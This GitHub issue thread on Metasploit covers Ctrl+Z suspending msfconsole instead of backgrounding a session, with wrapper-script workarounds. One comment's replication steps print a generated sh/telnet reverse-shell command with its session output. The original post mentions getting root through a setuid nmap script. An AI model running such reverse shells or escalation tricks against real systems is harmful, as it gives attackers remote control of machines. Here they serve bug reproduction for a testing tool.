Metasploit-framework: Cannot background command shell (non-meterpreter payloads)

Created on 20 Aug 2017  ·  13 Comments  ·  Source: rapid7/metasploit-framework

Steps to reproduce

How'd you do it?

  1. Run an exploit on Unix (this would probably be a problem on Windows too) using the normal exploit command.
  2. Press Ctrl + Z to try to background.

Expected behavior

It should background command session without closing msfconsole.

Current behavior

It closes msfconsole. What's weird is that it shows the "do you want to background" prompt after it closes msfconsole.

System stuff

Metasploit version

metasploit v4.15.7-dev

I installed Metasploit with:

  • it came with Kali

OS

Kali

PS: I can background with exploit -z, but I still cannot interact with the shell and then background it. Is there a way to rebind the background key?

Also, another question: I got root on a VM manually using the setuid nmap vuln and the command nmap --script script.txt, but I couldn't get it to persist through the whole command session. Is there a way to do that and make the meterpreter shell root? I used the setuid_nmap exploit module, but that one did not work for me.

bug msfconsole

Most helpful comment

I experienced this issue today. The SIGTSTP signal is not caught. When pushing Ctrl+Z the whole process is put in the background. I can get it back by using fg, and then I can put "y" to put the session in background.

Tested with fish and bash on manjaro linux. Metasploit 4.17.5

msf exploit(linux/samba/is_known_pipename) > sessions -i 1
[*] Starting interaction with 1...

Job 1, 'msfconsole -r login.rc' has stopped

Background session 1? [y/N]  ⏎
micke@Humlan ~/D/E/f/flag_07460> fg
Send job 1, “msfconsole -r login.rc” to foreground
y
msf exploit(linux/samba/is_known_pipename) >

All 13 comments

As a workaround this works:

  • make an sh file wrapper that catches SIGSTOP where msfconsole is located:

    #!/bin/sh
    trap "" TSTP
    /usr/bin/msfconsole

  • save as msfconsole.sh in the /usr/bin/ directory
  • chmod +x msfconsole.sh

I think this can be closed for now since that was kinda fixed I guess.

This still seems to be happening with the cmd/unix/reverse payload:
Framework: 4.17.2-dev-
Console : 4.17.2-dev-

I can reproduce this also for powershell and windows reverse shell payloads on v4.17.4-dev-. Also, this might depend on the desktop manager (specifically, I got this to happen on LXDE now and on Gnome in the past).

@fsacer I tested in gnome desktop manager.

@fsacer Okay, so it does background, but not in the sense that I could use meterpreter commands; upon reinteracting with the session it still goes back to the powershell terminal. Only powershell commands work because it's only a powershell session.

This normally still affects the latest msfconsole version:

msf5 > version
Framework: 5.0.35-dev-
Console  : 5.0.35-dev-

I like the workaround given above, with one tweak:

# cat /usr/local/bin/msfconsole 
#!/bin/sh
trap "" TSTP
/usr/bin/msfconsole "$@"

The "$@" part means arguments given to msfconsole will still apply (background: https://stackoverflow.com/a/4824637/372377). I also gave the wrapper script the same name, but since it's under /usr/local/bin/ (which is earlier in the $PATH), the wrapper script is called when running msfconsole.

Since this breaks some post-exploitation functionality otherwise (there's no way to exit powershell_shell inside meterpreter, for example, without Ctrl-Z), I'd recommend Rapid7 consider solving in the released versions.
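
Why the `trap "" TSTP` wrapper in the comments above works, as an added example that is not part of the thread or of Metasploit: a signal set to ignored is inherited by every process the shell starts, whereas a trap handler is reset to the default action in the child. Assumptions: Linux (reads /proc/self/status), SIGTSTP is signal 20 as on x86 and ARM, and the helper name `tstp_in_child` is hypothetical.

```shell
#!/bin/sh
# Added example, not from the thread. Linux-only: inspects /proc/self/status.
# Assumption: SIGTSTP is signal 20 (x86/ARM Linux), i.e. bit 19 of the SigIgn mask.
TSTP_BIT=524288   # 1 << 19 == 0x80000

# tstp_in_child ACTION   (hypothetical helper name)
#   ACTION is handed to `trap`: "" = ignore, "-" = default, anything else = handler.
#   Prints how a freshly exec'd child process sees SIGTSTP: ignored | default | unknown.
tstp_in_child() {
    (
        trap "$1" TSTP
        # awk is fork+exec'd from this subshell, so /proc/self is awk's own entry
        # and SigIgn is the disposition a child such as msfconsole would inherit.
        # Only the low 32 bits of the mask are kept (last 8 hex digits).
        mask=$(awk '/^SigIgn:/ {print substr($2, length($2) - 7)}' \
                   /proc/self/status 2>/dev/null)
        if [ -z "$mask" ]; then
            echo unknown            # no /proc available (not Linux)
        elif [ $(( 0x$mask & TSTP_BIT )) -ne 0 ]; then
            echo ignored
        else
            echo default
        fi
    )
}

echo "trap \"\" TSTP -> child sees: $(tstp_in_child '')"
echo "trap :  TSTP -> child sees: $(tstp_in_child ':')"
echo "trap -  TSTP -> child sees: $(tstp_in_child '-')"
```

Only the empty-string trap reaches the child as "ignored", which is also why a wrapped msfconsole can no longer be suspended from the parent shell with Ctrl+Z.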

Got the same problem on Metasploit v5.0.28-dev on Arch Linux. I can't background a shell/session with Ctrl+Z; it backgrounds msfconsole itself.

OK, this may or may not help anyone at this point, but I noticed I've been having this problem when I open msf with 'msfdb run' and not 'msfconsole'. I opened msf using the console command and it backgrounds the session and not all of Metasploit... just my observation.

Bringing this back from the dead to confirm @buneeflacs's comments.

If using 'msfdb run' it will fail. Use 'msfconsole' if you intend to use Ctrl+Z to background your sessions without making modifications to your msfconsole.sh file.

I haven't been able to replicate this with msfconsole. I did replicate with msfdb run - however that code doesn't live within metasploit-framework and is currently maintained by Kali:

https://gitlab.com/kalilinux/packages/metasploit-framework/-/blob/911ae0bf28bc34effbc6ff7709aa559d0b3adfbc/debian/extra/msfdb

If there are replication steps for msfconsole, this is something I can look into further.

As a workaround for backgrounding msfdb run you can add:

#!/bin/sh
trap "" TSTP

To the start of /usr/bin/msfdb, but it will stop you from completely backgrounding msfconsole.


My replication steps for Kali and msfdb run were

Creating the cmd/unix/reverse listener + payload:

sudo msfdb run
use cmd/unix/reverse
set LHOST 127.0.0.1
generate -f raw

to_handler

Copy the stdout payload into a new shell and run it:

$ sh -c '(sleep 3602|telnet 127.0.0.1 4444|while : ; do sh && break; done 2>&1|telnet 127.0.0.1 4444 >/dev/null 2>&1 &)'

Swapping back to the previous shell and interacting with it:

msf5 payload(cmd/unix/reverse) > [*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo 22NSKBnp2W9syQws;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "22NSKBnp2W9syQws\r\n"
[*] Matching...
[*] B is input...
[*] Command shell session 1 opened (192.168.222.1:4444 -> 192.168.222.130:34418) at 2020-07-29 11:05:08 +0100

msf5 payload(cmd/unix/reverse) > sessions -i 1
[*] Starting interaction with 1...

Attempting to foreground the session:

^Z
[1]+  Stopped                 sudo msfdb run
kali@kali:~$ 
Background session 1? [y/N]  y
bash: y: command not found

kali@kali:~$ 

Well, I'm facing the same problem here running:

Ubuntu 20.04 LTS
MTE: 6.0.18-de-v

I could work around that just by switching to a non-existent session:

meterpreter > sessions 1
[*] Session 1 is already interactive.
meterpreter > sessions 2
[*] Backgrounding session 1...
[-] Invalid session identifier: 2